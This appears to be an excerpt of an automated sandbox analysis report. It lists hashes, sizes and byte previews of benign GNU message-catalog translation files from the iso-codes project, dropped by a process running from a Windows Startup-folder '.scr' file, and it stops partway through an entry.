                                                                                                    SSDEEP:48:fM68wAvRhSE0DOQyIjQ5p+L69hziMUXvLpGdQ0sO3D7WpwVzJn:fB8w0YBDOSUX3riMAvdYQ01kwtp
                                                                                                    MD5:FE25660F3A4A7FA2C22970A9811F1C75
                                                                                                    SHA1:7FE0D5E91D908A19884EA94E0A1AB06FF3584027
                                                                                                    SHA-256:940CE5FD966629D4B85DEC61DB441C562D46522005B2EDEFDBD6FC639FAEFCA7
                                                                                                    SHA-512:4B683C542FC73CB12B2F519A62CB78AC4520DF30BDEF854BC480EC6CC0364A06C0A13AC45B6BF8A93D5A7162EB1CE9700DD59297B6C8FC55E3CC17FAD8C39C2C
                                                                                                    Malicious:false
                                                                                                    Preview:........<...........S...........(.......).......3.......:.......C.......O.......V.......a.......i.......p.......z.......................................................................................................................................................................$.......,.......4.......?.......J.......R.......X.......b.......t.......{.......................................................................................................................................................................................................................................................................(.......1.......;.......D.......R......._.......k.......v.......................................................................................................................#...............7.......A.......X.......b.......p.......|...............................................................................................................................(.......0...............
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 85 messages, Project-Id-Version: iso_3166-1 'Dzi\305\202igaii Bik\303\251yah'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5808
                                                                                                    Entropy (8bit):5.260294453956496
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:TN+TSD5YxsgXFhRTokfLku2wxey9aMLLk52q7KoosKPPiv:/YxjXVo4Lkk/LLLk52q7bQav
                                                                                                    MD5:E687CBAAB0AA35D075885F76A904BC65
                                                                                                    SHA1:C8EF76E404FCA8708FB10146E7E9C81DDDE26EBF
                                                                                                    SHA-256:4EFC0464D9037A47C2ECFC28F7C23BB39AC4B97A354B2D7AE87E4FCE6FECE7B3
                                                                                                    SHA-512:A2EF60061B5C6DB7E32F507C4330A07B38644C3CBE3BDCEFDEC6B9FAE3EE0615A887A5DBBF21D103A58E17505D6796CE06EFBFBADCEC84476A9C6140C1D412E2
                                                                                                    Malicious:false
                                                                                                    Preview:........U...........q...l.......0.......1.......9.......A.......I.......S.......[.......f.......n.......u.......}...............................................................................................................5.......=.......D.......L.......S.......].......k.......s.......{.......................................................................................................................................................%.......+.......7.......?.......F.......O.......`.......e.......q.......x.......................................................................................................................................*.......2.......G.......V.......o.......y...............................k...6...............................,...................-...#...M.......q...........!.......................-...........!...)...2.......\.......x...........................=.......'...%.......M.......m...........'...............................7...........%..."...E.......h...'...
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 37 messages, Project-Id-Version: 'Arab'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1713
                                                                                                    Entropy (8bit):4.629314251353993
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:cHapnxTH1LfEpCwcvySKjNLiu4N9WUJCDlVvd:c6pxTH17EpCvEN4vW+ChVvd
                                                                                                    MD5:EE837205044F66AEBFBDA38D0D846E36
                                                                                                    SHA1:C87FF8BFC67BEC0D16A8D3057D6DB3FA0449D6C3
                                                                                                    SHA-256:25B24D137A5497035EB84A9618CF04A91926631576CFE7EAC1F42CFAF6D58D9F
                                                                                                    SHA-512:3FB0755A042388B57B1326514C50DDC79D4DE002374DA61ABBE2D617A2CCF0B78C71992DFFABEEC503C66CC67971E72E2481C64EA5D9AEDEC369FB811D843771
                                                                                                    Malicious:false
                                                                                                    Preview:........%.......D...5...l.......@.......A.......H.......Q.......Z.......`.......h.......p.......y.......................................................................................................................................................................................).......1.......8.......>.......E.......J...B...R.......................................................................................................................................................".......(.......1.......7.......=.......E.......M.......W.......a.......h.......r.......x.......................................................................!...$..............................................."... .......#...................................................................................................................%............Arabic.Armenian.Balinese.Batak.Bengali.Braille.Buginese.Carian.Cherokee.Coptic.Cyrillic.Gothic.Greek.Gujarati.Gurmukhi.Hebrew.Javanese.Kannada.Khmer.Lao.Latin.Limbu.Ly
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 425 messages, Project-Id-Version: iso_3166-1 'Afganistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23749
                                                                                                    Entropy (8bit):5.01845304395756
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:a0Wswrfn6CnT5WqL67eY1cCb+z5wsWP48WAINiZGsWwg1rDrplAEs4A:osqtnL67VcyImsWP48WAI+W31rP7AEnA
                                                                                                    MD5:5FD951713DF81AF94E3A681E2C1935DA
                                                                                                    SHA1:A3436B628A23582AFE639BFD8933C585E50D5671
                                                                                                    SHA-256:C77E9BC2E5A577A913F06439857993596C9915BF2B4DC4EDBF1F4C7D808C717C
                                                                                                    SHA-512:C3B893ACA09A6F428FC72C980E9DBBA8FF066B3D74DA4EAA32AC131014215EF32220678BCED9C930B3AD5B7AACB32AAE7529D3366485A520C61CA33D76558337
                                                                                                    Malicious:false
                                                                                                    Preview:................d...9............#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$......'$....../$......5$......?$......G$......R$......Z$......b$......m$......v$......~$.......$.......$.......$.......$.. ....$.......$.......$.. ....$.......%......#%......,%......:%......A%......`%......w%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&......-&......6&......O&......k&......s&..%...y&.......&.......&.......&.......&.......&.......&.......&.......&.......&..%....&..,... '.."...M'..*...p'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......(.......(...... (......)(......2(......N(..'...\(..$....(.......(.......(.......(.......(.......)......:)......?)......G)......N)......\)......m)......}).......).......).......).......).......).......).......).......).......).......).......*.......*.......*.......*......%*.......*......5*......C*......J*......P*..!...
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 123 messages, Project-Id-Version: oc 'Ain'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5637
                                                                                                    Entropy (8bit):4.752446275977486
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:gIIDdoVVGHdGIi+VhAsiVBiWnIt1yi2VZOitqrw/yhIhqtuRlbTPrhyo12K4F:aZoVQBi+7YvieIeiqZOitqrw/XhFxTDa
                                                                                                    MD5:5C570E1EEF5F9417165E225B64BB622A
                                                                                                    SHA1:835473FF6B4D3D3781F12F171A96291D93B46A35
                                                                                                    SHA-256:220EC8EDDC5FA2C57597DF00C94959DD23B5E72F39A6793F78819B072E1D18D3
                                                                                                    SHA-512:B6BEA2D92CB6A645D631D81DDDC7DC9CCF211035E01D82A2563AD74AB17C474D2C079AA8DC6B2E7A4ABCE48E43C1655D975E6C910A4B75B806CD7F6BF0F4695F
                                                                                                    Malicious:false
                                                                                                    Preview:........{.......................h.......i.......m.......s.......z...............................................................................................................................(.......1.......8.......A.......S.......X.......a.......g.......t.......{...............................................................................................................................................................).......3.......?.......M.......Y.......e.......r.......................................................................................................................!.......(.......8.......<.......K.......S.......^.......e.......t.......y.......................................................................................................................................................+.......8.......O.......e.......l.......q.......x...................................................................$...................".......&......./.......7.......>.......E.......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 13 messages, Project-Id-Version: iso_3166-3 'Tim\303\262r \303\210st'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1105
                                                                                                    Entropy (8bit):5.137070808140005
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:lPz6MyTmibUqgqqvL5t0UK7Ks812b9XmUiBdtRRic:NBqavLoUo81285D
                                                                                                    MD5:ECF920C7C382ACA588F7B84C38862068
                                                                                                    SHA1:B22508B2E3C613B3FE288264C4F5B15F4512C301
                                                                                                    SHA-256:102A72BA4E52FD19F3C257B2DD0A369802B27A1376465E07C265378ECD7C3857
                                                                                                    SHA-512:518D1C5595DD791DEF55643345298C7D65E766D736EFC4E78B8C691BE4E4D10F33F14566C520673B608A62AAE5F5242822C34D421A8AB2F41897A24E7D28DC7E
                                                                                                    Malicious:false
                                                                                                    Preview:................................0.......1.......<.......Q.......l........................................... .......................q...'.......................................................................................4.......<........................................................................East Timor.France, Metropolitan.German Democratic Republic.Gilbert and Ellice Islands.Midway Islands.Netherlands Antilles.Neutral Zone.Serbia and Montenegro.Upper Volta, Republic of.Viet-Nam, Democratic Republic of.Wake Island.Zaire, Republic of.Project-Id-Version: iso_3166-3.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2008-11-10 00:45+0100.Last-Translator: Joan Luc Lab.rda <laborde@crpp.u-bordeaux.fr>.Language-Team: Occitan <laborde@crpp.u-bordeaux.fr>.Language: oc.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit..Tim.r .st.Fran.a Metropolitana.Republica Dominicana.Irlanda.Irlanda.Holanda.
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 5 messages, Project-Id-Version: iso_4217 'Euro'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):527
                                                                                                    Entropy (8bit):5.099122001891158
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:iCgE0qfl0WPvkSnPJVxRt02Ukf/1zoFiXmBQWiaT2l:YE0qR0SVPt0UX1znXmFTC
                                                                                                    MD5:B56DA8D9C720E49BADC4A0E83D4E788C
                                                                                                    SHA1:025E1AF11D45A7D84422F92587662F4A51146158
                                                                                                    SHA-256:DF0F715FEA9D70EBF0404D7320BA1FFDD09D0A4A8B4F8D97D3EF61D3382BD0EC
                                                                                                    SHA-512:D54EC4FFFCA8AF37F750424E32B6A3BB4F07DD0EDDDA39D895480141D215B9D9BF854410FB23A5E5220AC519B4A9B69876213208A9BBF8B971C5C9FD7834B913
                                                                                                    Malicious:false
                                                                                                    Preview:................D.......l...........................................I....................................................................Euro.Gold.Guarani.Swiss Franc.Project-Id-Version: iso_4217.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2008-11-10 01:11+0100.Last-Translator: Yannig Marchegay <yannig@marchegay.org>.Language-Team: Occitan.Language: .MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit..Euro.Aur.Guaran..Franc so.s.
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 79 messages, Project-Id-Version: iso_639-3 'Abcaze'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3446
                                                                                                    Entropy (8bit):4.647954193882982
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:54MchPv30I8E2XX4iMA812qeyHPGPdj0D:5dqpgXIDZ6yHPGPS
                                                                                                    MD5:64179BB447E6D690DC85BE54C17FE125
                                                                                                    SHA1:E3E3EC6E78BF189B3A8BEE73DB720F2AED09312E
                                                                                                    SHA-256:5C2CEDBE2C56C6F65DB2FEDEC4E26A9FF6F3BD99AA72610119E4A4C0ACE554B0
                                                                                                    SHA-512:FE8464D373711A9C274FA4F081FE5247F3A9DF254A4C513E801041DBE4541B57BBED2900FB2265AF669048822157FDF9DB9E11236025CACFDA10F6E466BAF721
                                                                                                    Malicious:false
                                                                                                    Preview:........O...........k...........................................................................................................................(.......0.......8.......A.......H.......P.......Z.......c.......k.......s.......z.......................................................................................................................................&......./.......6.......>.......D.......L.......W.......a.......f.......n.......x.......~............................................................................................................................................... .......'.......1.......>.......C.......N.......T.......Z.......a...n...f.......................................................................................%.......-.......4.......;.......D.......L.......R.......Y.......a.......k.......t.......|...............................................................................................................................!.......+.......3.......<.......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 7 messages, Project-Id-Version: iso_639-5 'lengas australianas'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):856
                                                                                                    Entropy (8bit):5.2094202490694705
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:m8AA7/I+sXQdXTt0Us5m9A/F9XmGDQ1Rrn:hEXQRCU/qCCYRrn
                                                                                                    MD5:48396F01163E08E7950361FB89462035
                                                                                                    SHA1:C16B27BFB3438657C3E08B73048B8187D835F3A3
                                                                                                    SHA-256:B73F6D2063F8ED61412647776C10964D5E1174E53553415981B10D4FBA86884E
                                                                                                    SHA-512:ECE83E14A66577B67432A9FBBC1F0A52AE85A14517027760F1CF44F51228214D2ED96D2E1D9EEB4F58853885554D477662164ACCB17AE547B0B8A0B52A77640A
                                                                                                    Malicious:false
                                                                                                    Preview:................T.......................................................................$...............................%.......6.......I................................................Australian languages.Basque (family).Celtic languages.Italic languages.Japanese (family).Nahuatl languages.Project-Id-Version: iso_639-5.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2020-04-27 18:11+0000.Last-Translator: Quentin PAG.S <quentinantonin@free.fr>.Language-Team: Occitan <https://hosted.weblate.org/projects/iso-codes/iso-639-5/oc/>.Language: oc.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit.Plural-Forms: nplurals=2; plural=n > 1;.X-Generator: Weblate 4.0.2..lengas australianas.basc (familha).lengas celticas.lengas italianas.japon.s (familha).Lengas nahuatl.
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 419 messages, Project-Id-Version: iso_3166-1 '\340\254\206\340\254\253\340\254\227\340\254\276\340\254\250\340\254\277\340\254\270\340\255\215\340\254\244\340\254\276\340\254\250'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):34110
                                                                                                    Entropy (8bit):4.996375948439053
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:jhl7o5a/DCzHCG/Ubjh5wsWP4XdAIzirGwPxB3lloPue1n6UnjN1fn9:jhZOziGItmsWP4XdAI8BYuM6Ub9
                                                                                                    MD5:56A3A098FFB529B194522A8B9032C4C6
                                                                                                    SHA1:CB1367516DA0AA7C434582D556B8CD49045467F4
                                                                                                    SHA-256:97F21E0762094C2BC12A98F1A60CEC3AFC7EA7BA6C99A46D5BC7FFA1578A2806
                                                                                                    SHA-512:548A91A4FA496E3787F001D2D040A651227CA9756FA82D0104496EC4AF034D5BA2B593FA498AD8B7F4BF3C013A3927220A32403AEA54161755553F29384C488F
                                                                                                    Malicious:false
                                                                                                    Preview:................4...3...L........#.......#......%#......-#......5#......D#......L#......S#......\#......g#......{#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$.......$.......$......#$.. ...*$......K$......S$.. ...s$.......$.......$.......$.......$.......$.......$.......$.......%.......%......'%....../%......:%......C%......L%......S%......b%......{%.......%.......%.......%.......%.......%.......%.......%..,....%...... &......(&..%....&......T&......a&......l&......t&......y&.......&.......&.......&.......&..%....&..,....&.."....'..*...%'......P'......X'......a'......j'......}'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......(..'....(..$...9(......^(......z(.......(.......(.......(.......(.......(.......(.......).......)......")......2)......N)......T)......f)......m)......u)......}).......).......).......).......).......).......).......).......).......).......).......).......).......)......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: iso_3166-3 '\340\254\254\340\255\215\340\254\260\340\254\277\340\254\237\340\254\277\340\254\270 \340\254\206\340\254\243\340\255\215\340\254\237\340\254\276\340\254\260\340\255\215\340\254\225\340\254\237\340\254\277\340\254\225\340\254\276 \340\254\266\340\254\276\340\254\270\340\254\277\340\254\244 \340\254\205\340\254\236\340\255\215\340\254\232\340\254\263'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3975
                                                                                                    Entropy (8bit):5.181253203564385
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:qDemyBo3rC9PReRbGReRNzGReRq5GFRZRvoXn6mvR6R5RiR7RZRMRP:qDp74UIU2UEgFz98hw/gJziJ
                                                                                                    MD5:6C51EDCA515B3EE0C7B91AA66361D85F
                                                                                                    SHA1:EE80BF5EC63DFE66AB4C775D0F27445FC855CD46
                                                                                                    SHA-256:0F327173A6E281FC582E5A647541AB704CDBD5BF25C766559E5FD2AFD21319DA
                                                                                                    SHA-512:F8C401F98C73C6A4DF5977EC0E621C4FEA24F30A5EBD52E90573A07C6D892FFFD5F962AC28D21BAD7C9AE432009ECFA2C3AE571B5A61400FD6F0592964835AA1
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c...................Z...h...^.......|..."...Z.......................2.......".......).......3...........P...V.......H...+...1...t...........=.......(...........-...r...M...8.......A...........;...(...K...J...t...`.......3... ...H...T...................)...]........................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 3472 messages, Project-Id-Version: iso_639-3 '\340\254\206\340\254\260\340\255\207 \340\254\206\340\254\260\340\255\207'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):217560
                                                                                                    Entropy (8bit):5.207463248376477
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:Il9Srk52U2xhT4mXxYhRu7FvK698cE6MU7+uUG+:QSjB8uhvh9/E6MU7+uUN
                                                                                                    MD5:C64E277D657717910C30AF3F1103013D
                                                                                                    SHA1:0EF9B49E8E63E16651197BEBFE47344F04212E77
                                                                                                    SHA-256:C9916C77A48226501C314465D3A4A8C5B00657F8D0D9B41BA5AB6350BDE743B3
                                                                                                    SHA-512:977B260F7BD27829A6D9F77CAA21D349668D866F34F9C4601FBEBA810C9B766627906089D57CF4B419ED8417AC8674A3EDCD5636D85012F24455075D145268F2
                                                                                                    Malicious:false
                                                                                                    Preview:.................l...............!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!......."......."......."......,"......1"......6"......<"......@"......M"......R"......W"......]"......b"......j"......q"......y"......~".......".......".......".......".......".......".......".......".......".......".......".......".......#.......#.......#.......#......&#......,#......3#......:#......?#......F#......J#......P#......U#......j#......q#......z#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$......*$......:$......J$......_$......s$......~$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......%.......%.......%.......%......&%......5%......F%......R%......X%......^%......u%......x%......|%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 426 messages, Project-Id-Version: iso_3166-1 '\340\250\205\340\250\253\340\250\227\340\250\276\340\250\250\340\250\277\340\250\270\340\250\244\340\250\276\340\250\250'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):30877
                                                                                                    Entropy (8bit):5.04853768881185
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:F9k3DKSosmLal1lINWV46nbjz5wsWP48WAINiZGZ98TwSOXVmTyQ:0oCl1lINS48fmsWP48WAI/17XVmH
                                                                                                    MD5:70288770A22F7964C0612F04A4768359
                                                                                                    SHA1:9B7C2558ACF49717D0E8188D40E81F3C22611573
                                                                                                    SHA-256:F44AC265DC8D9596007803D132F4FEDA093BCB16DA1779FEF69E2493189B8B88
                                                                                                    SHA-512:8595D6662B42C432AE02FDF82ADBADEA0426115A51392938024B409BC3A67D400BFDEDB5A14817D1EBBAB6E75BBAAE35770747EC12DF9A80BDD42FBCCC1845C1
                                                                                                    Malicious:false
                                                                                                    Preview:................l...9............#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$......$$......7$......?$......E$......O$......W$......b$......j$......r$......}$.......$.......$.......$.......$.......$.......$.. ....$.......$.......$.. ....$.......%......3%......<%......J%......Q%......p%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&.......&.......&......%&......=&......F&......_&..,...{&.......&.......&..%....&.......&.......&.......&.......&.......'.......'.......'...... '......('..%...7'..,...]'.."....'..*....'.......'.......'.......'.......'.......(......!(......)(....../(......;(......M(......U(......](......f(......o(.......(..'....(..$....(.......(.......).......)......:)......Y)......w)......|).......).......).......).......).......).......).......).......).......).......).......*.......*.......*....../*......6*......@*......H*......S*......X*......b*......k*......r*.......*.......*......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 32 messages, Project-Id-Version: iso_3166-3 '\340\250\254\340\250\260\340\250\244\340\250\276\340\250\250\340\251\200\340\250\206 \340\250\220\340\250\250\340\250\237\340\250\276\340\250\260\340\250\237\340\250\277\340\250\225 \340\250\226\340\251\207\340\250\244\340\250\260'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3558
                                                                                                    Entropy (8bit):5.325196839438733
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:rLvaI+yaCoZ012EAy4cJQi9N8DeGNMN5b/1dv:XaIeFZOTogNB
                                                                                                    MD5:3B610AEE71231A7ED45901FE797C2BD1
                                                                                                    SHA1:9C6FB17A0AEF8D9EA4B02036C4C1B1A64AD5C1F0
                                                                                                    SHA-256:4E4FA543A741A4A0BC5178C57D3B3BAB94D38AAD9493B2059C4FEA80194F229B
                                                                                                    SHA-512:22833144CA07ED23D002062D4E58FB3EA029D1EE99583BCECF478F273D6EF1379227AF08A0B5AE4114139FA929F49A131A3EE6C4D4C9B8406841D19FECC32EA1
                                                                                                    Malicious:false
                                                                                                    Preview:........ ...........+.......................).......*...........:.../...W...........................................)...........................9.......I.......X.......m.......z...!....................................... .......)...........5... ...N.......o...2...{...+.......................;.......?.......Q...C...B.......v...........O.../...b.........../.......6.......L.......5...f...9......."...............1...........H.......h...A.......,.......;...........3...(...C...5...l...+.......-.......&...........#...3...:...W...n................... ....................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 7230 messages, Project-Id-Version: iso_639-3 '\340\250\205\340\250\260\340\251\207\340\250\205\340\250\260\340\251\207'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):410401
                                                                                                    Entropy (8bit):5.203330020965122
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:oJpFgLLk8RgsOqjBZpQNmn9E8d1xIQ9HLEry3hqzxfEv:oGLS1UwmPxxregUzxsv
                                                                                                    MD5:3278886A02A552A6A88D3F011BFCB7AF
                                                                                                    SHA1:401E20D07F9C5FC4ABD530403080274CC48B9D15
                                                                                                    SHA-256:4F9E282949333A7BD2D3A7DF213CB8203359E8DD1B893C9440C7703AB54139F0
                                                                                                    SHA-512:2CD7B1779B0B3718C5787F928483B091397DEE3C13EB83C03385D08CFC66A1800D3743CC98F6849F6F7CF62A8FC9AB52A9E24873A3704569E73048C230595139
                                                                                                    Malicious:false
                                                                                                    Preview:........>............%...........Z.......Z.......Z.......Z.......Z.......Z.......Z.......Z.......Z.......Z.......Z.......Z.......Z.......[.......[.......[.......[......"[......,[......<[......L[......Q[......V[......\[......`[......e[......j[......o[......u[......}[.......[.......[.......[.......[.......[.......[.......[.......[.......[.......[.......[.......[.......[.......[.......[.......\.......\.......\......%\......,\......2\......9\......=\......G\......U\......]\......c\......j\......q\......v\......}\.......\.......\.......\.......\.......\.......\.......\.......\.......\.......\.......\.......\.......\.......\.......\.......\.......].......].......]......!]......9]......O]......]]......m]......z].......].......].......].......].......].......].......].......].......].......].......].......^.......^.......^.......^.......^......&^......-^......5^......<^......B^......I^......O^......V^......c^......p^......v^......~^.......^.......^.......^.......^.......^.......^.......^......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 18 messages, Project-Id-Version: iso_15924 '\330\247\331\201\330\247\332\251\330\247'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1418
                                                                                                    Entropy (8bit):5.485459756918596
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:tOPm8grJZG4r0dOA3F27CVt0UK/R7/oXmGufPWo4IYNZOsM0:YgrWU97lU87B3xfYxM0
                                                                                                    MD5:35B123860AA29B8E037769223ECB619C
                                                                                                    SHA1:FBA5C0E00666340EC6248C758F249E863E9A6366
                                                                                                    SHA-256:2C9F968D7482C5D47B75E1E234B37FF34B358B313CFBB363B60ABB26F65088D9
                                                                                                    SHA-512:A746C60A93D6654AB5FAC8873338076F193D7D967209EBE327DEC73C266F914B3ECEBB93D9D9FD9726E69F78D35C8E5358E3F4B00346C66AB7834ED969A37A07
                                                                                                    Malicious:false
                                                                                                    Preview:........................<.......................................................................................................=.......A.......G.......O.......[...%...g...............p.......{...(...............................................................$...................5.......B.......O.......e.......w........................................................................................................................Afaka.Arabic.Arabic (Nastaliq variant).Bengali.Braille.Cherokee.Devanagari (Nagari).Greek.Gujarati.Gurmukhi.Korean (alias for Hangul + Han).Lao.Latin.Multani.Old Persian.SignWriting.Unified Canadian Aboriginal Syllabics.Project-Id-Version: iso_15924.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2022-10-24 07:37+0000.Last-Translator: bgo-eiu <huyaqoob+toolforge@gmail.com>.Language-Team: Punjabi (Pakistan) <https://hosted.weblate.org/projects/iso-codes/iso-15924/pa_PK/>.Language: pa_PK.MIME-Version: 1.0.Content-T
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 11 messages, Project-Id-Version: iso_3166-2 '\331\276\331\206\330\254\330\247\330\250'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1018
                                                                                                    Entropy (8bit):5.50517354779157
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:X/seOj9+exADl2PLKTP69Q2PSt0UK/R7/+XmGuad/+V5uws5:h0+exQiMPO5P/U87TKd/+V5zs5
                                                                                                    MD5:60A278807BB880B6751EDFD9FA9E284B
                                                                                                    SHA1:BE18A5E65983458E5483CD0EB24486C0B7717D6E
                                                                                                    SHA-256:AA55BBA3244FC9A0A0B640110A6C39A98B4BE3B50B97227686E6D2B4DD2BDDC9
                                                                                                    SHA-512:85132D7170E2AACE4140E0C02D59D9BCCA18DD75C7D4509F2C53F241AF4322BA1B5A808383F704A7B6B5F58F4F0A439A02D6066337E86FE16F41E1B18F20F6BB
                                                                                                    Malicious:false
                                                                                                    Preview:................t...............................................#.......+.......@.......I.......T.......b.......l.......t.......Y.......d.......m.......v... ....................................................................................................................Punjab.Sindh.Utah.Vermont.Virgin Islands, U.S..Virginia.Washington.West Virginia.Wisconsin.Wyoming.Project-Id-Version: iso_3166-2.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2022-10-24 07:37+0000.Last-Translator: bgo-eiu <huyaqoob+toolforge@gmail.com>.Language-Team: Punjabi (Pakistan) <https://hosted.weblate.org/projects/iso-codes/iso-3166-2/pa_PK/>.Language: pa_PK.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit.Plural-Forms: nplurals=2; plural=n > 1;.X-Generator: Weblate 4.14.2-dev............................. ..... ............................ ..............
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 2 messages, Project-Id-Version: iso_3166-3 '\331\205\331\220\332\210\331\210\333\222 \331\271\330\247\331\276\331\210'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):601
                                                                                                    Entropy (8bit):5.468993704980499
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:iqi1f4xjt02Ukw3t//IGJ5LLPN1/4N6XmBQWiOWuQa:sO5t0UGt3R7/XXmGu3
                                                                                                    MD5:8BEABF7FA7126D1721493880BE98BD05
                                                                                                    SHA1:22EA3E5A04EA4ABE5FC6D6E5444618C1154D2754
                                                                                                    SHA-256:A2E2FD48EFC744EACDCF4FA78B7BD7388FCA71888381EFD5DE4F17EEA1000260
